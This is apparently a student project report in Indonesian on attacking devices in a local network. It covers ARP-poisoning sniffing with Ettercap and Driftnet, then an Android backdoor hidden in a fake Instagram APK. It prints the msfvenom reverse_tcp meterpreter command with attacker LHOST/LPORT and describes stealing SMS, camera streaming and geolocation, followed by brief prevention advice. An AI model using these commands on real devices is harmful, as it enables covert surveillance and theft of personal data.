18 4.1 Implementasi
Hasil implementasi dari percobaan penetrasi jaringan lokal yang dilakukan padapembuatan proyekkali ini dapat dilihat dari kesamaan data yang didapat oleh penyerang dan data yang sedang apada pada korban. Berikut adalah hasil karya dan hasil implementasi proyek.
4.1.1 Penyerangan dengan metode Sniffing
Proyek yang dilakukan oleh penulis menggunakan dua cara metode penyerangan, metode pertama dengan metode Sniffing metode yang menyerang korban tanpa diketahui oleh korban, penyerang menyadap data korban hanya dengan masuk kedalam jaringan yang sama, untuk lebih jelasnya dapat disimak urutan penyerangan yang dipaparkan gambar.4.1 dam gambar 4.2. beserta penjelasannya.
Langkah pertama dengan mencantumkan jaringan mana yang akan digunakan untuk melakukan sniffing,
Gambar 4.1 Tampilan Awal Ettercap
Langkah selanjutnya, memeindai pengguna yang ada dalam jaringan yang dimasukki korban seperti pada gambar 4.2, setelah memindai memasukkan IP gateway sebagai target pertama dan IP korban sebagai target kedua, selanjutnya dilakukan ARP Poisoning dengan
Gambar 4.2 Hasil memindai pengguna pada jaringan
Setelah melakukan langkah pada gambar 4.2 penyerang hanya dengan memnuka terminal dan menuliskan perintah :
Kode Program 1. Kode Program Untuk Menjalankan Drifnet
Yang berarti memerintahkan untuk membuka aplikasi Drifnet dengan acuan adapter wlan0 untuk melakukan Sniffing seperti pada gambar 4.3, maka akan muncul dialog disebelah Terminal yang menjadi hasil
Sniffing yang dilakukan. Gambar tersebut bisa disimpan pada komputer penyerang.
Gambar 4.3 Drifnet dijalanakan melalui terminal
4.1.2 Penyerangan dengan metode Backdoor
Gambar 4.4 Membuat Backdoor
Gambar 4.4 menunjukan proses pembuatan
Backdoor, dengan mengetikkan perintah:
Kode Program 2. Kode Program Untuk Membuat Backdoor
Perintah tersebut memerintahkan metasploit untuk membuat backdoor dengan payload android yang menggunakan cara reserve TCP, cara ini membuat penyerang memrintahkan korban agar memanggil di port yang telah ditentukan, jika perintah itu dieksekusi sehingga memicu celah terbuka dan dapat dimasukki oleh penyerang, LHOST pada perintah di atas mengacu pada IP yang didapat penyerang oleh penyerang dari jaringan yang didapati dan LPORT sesuai dengan kebutuhan, jika port yang digunakan diblokir oleh admin maka harus menggunakan port yang lain, dan perintah R> menunjukan dimana letak aplikasi yang akan disusupi
backdoor, yang nantinya akan ditanam ke sistem korban. Pada proyek kali ini aplikasi yang akan disisipi backdoor
bernama “Instagram” dengan format APK.
Setelah membuat celah yang akan ditanam dalam sistem korban langkah selanjutnya menanamkan ke dalam
Msfvenom -p android/meterpreter/reverse_tcp
LHOST=192.168.5.253 LPORT=4444 R>
sistem, jika sudah tertanam maka akan tidak terlihat dan hanya bisa dilihat pada menu pengaturan aplikasi korban, penanaman hanya seperti menginstal aplikasi biasa. Lihat gambar 4.5, aplikasi yang disisipi backdoor pada langkah sebelumnya (lihat gambar 4.4) bernama instagram denganf format APK.
Gambar 4.5 Celah dalam bentuk program siap dipasang
Setelah diinstal maka hanya dapat dilihat pada menu pengaturan Aplikasi sistem korban.
terpicu untuk terbuka dan penuerang bisa masuk, lihat gambar 4.6 dibawah ini.
Gambar 4.6 perintah membuka Metasploit
Setelah tebuka, maka akan muncul pada gambar 4.7 dengan ditandai terminal masuk ke metasploit.
Gambar 4.7 Terminal masuk ke metasploit
Jika sudah masuk, penyerang hanya memasukkan payload, lokal port, dan lokal host yang akan digunakan, lalu eksploit. Jika berhasil maka akan ada satu sesi yang terbuka. Lihat pada gambar 4.8.
Gambar 4.8 Langkah untuk memicu celah yang ditanam
dalam pemicu, lalu pada baris kedua menunjukan
payload yang digunakan, pada perintah ketiga menujukan Lokal host yang digunakan, dan pada perintah ke empat menunjukan lokal port yang digunakan, semua harus sama seperti pada langkah gambar 4.4. dan pada baris terakir, adalah perintah untuk eksekusi, gambar 4.8 menunjukan celah yang dibuka berhasil dimasuki penyerang, ini dapat dilihat dari kata “meterpreter session 1 opended” yang berarti penyerang
mendapatkan sesi untuk mengendalikan atau mencuri data.
4.2 Hasil Pengujian
Berdasarkan implementasi proyek ini, didapati hasil pengujian yang menunjukan keberhasilan akan penyerangan terhadap suatu sistem dalam jaringan lokal, penyerang dapat menyadap gambar yang sedang korban akses dan dapat mencuri data yang ada, lihat gambar 4.9 untuk hasil kesamaan gambar yang sedang diakses
Gambar 4.9 Kesamaan gambar yang sedang diakses
Gambar 4.9 menunjukan kesamaan gambar yang diakses oleh korban melalui aplikasi Instagram, dan pemyerang menyadap gambar korban melalui metode sniffing seperti yang dilakukan pada poin 4.1.1, hasil yang sama ini menunjukan keberhasilan penyerang menyadap gambar korban.
Kesamaan isi SMS yang dicuri oleh penyerang dan SMS yang ada pada korban menunjukan keberhasilan pencurian data yang dilakukan dengan metode backdoor, metode ini dapat melakukan beberapa kegiatan lain, seperti mengakses kamera secara langsung (streaming) tanpa diketahui oleh korban, seperti gambar 4.11.
Gambar 4.11 penyerang akses kamera korban
Gambar 4.12 Menu penyerangan
Gambar 4.12 menunjukan menu yang bisa dilakukan selain menggunakan kamera korban dan mencuri sms, penyerang dapat melakukan pengiriman SMS ke nomor tertentu, atau mencuri data panggilan yang dilakukan korban, atau penyerang mendapatkan lokasi dimana korban saat itu dengan menu
geolocate.
4.3Analisis Hasil Proyek
Penyerangan yang dilakukan pada proyek ini terbilang berhasil, penyerangan dapat terjadi dengan berbagai kemungkinan, penulis mendapati analisa sebagai berikut:
karena korban masuk kedalam jaringan hanya diidentifikasi sebagai pengguna biasa tanpa ada kecurigaan sebagai pengguna nakal, sniffing dilakukan dengan menggunakan cara menduplikasi
gateway korban pada jaringan dialihkan kepada IP penyerang, sehingga data yang diakses oleh korban otomatis masuk kepada penyerang, pemalsuan gateway itu dilakukan tanpa ada halangan, karena jaringan hanya memberi akses pada pengguna tanpa bisa membatasi kegiatan. Jika ada konfigurasi firewall pada router
pun juga sama hasilnya, penyerang masih dapat melakukan kegiatan sniffing dengan lancar tanpa ada gangguan.
Indikasi tersebut berarti tindakan untuk mencegah atau menghentikan sniffing hanya dengan membagi jaringan yang dipakai oleh pengguna biasa dan pengguna staff perusahaan jika itu dalam lingkup perusahaan, sehingga aman dari tindakan penyadapan dan tidak menimbulkan kecemasan akan khawatir akan disadap atau dicuri datanya.
Penyerangan dengan metode backdoor bisa dicegah dengan menggunakan program anti virus pada sistem korban, karena dalam penginstalan aplikasi terdapat sesuatu yang sekiranya membahayakan pengguna perangkat maka akan diperingatkan oleh anti virus akan bahaya jika menginstall aplikasi tersebut, jika tidak menggunakan anti virus, jangan root perangkat, karena dengan akses root akan membuat perangkat selalu menurut dengan pengguna apapun itu perintahnya, beda dengan perangkat yang belum diperbolehkan untuk hak akses root, biasanya perangkat yang belum di-root akan memiliki keraguan untuk menginstal aplikasi yang sekiranya membahayakan, ini otomatis akan membuat pengguna perangkat lebih aman, karena setiap sistem pasti memiliki model perlindungan standar yang dilakukan untuk melindungi penggunanya dari hal-hal yang tidak berkenan, paling tidak meminimalisir agar tidak terjadi sesuatu yang tidak baik.
tidak sengaja memasang aplikasi tersebut atau tidak tau aplikasi itu dan menurut untuk memasang aplikasi tersebut maka otomatis sistem pengguna akan membuka celah yang dapat dimasuki oleh penyerang. Karena metode penyerangan backdoor dapat dilakukan juga walau beda jaringan.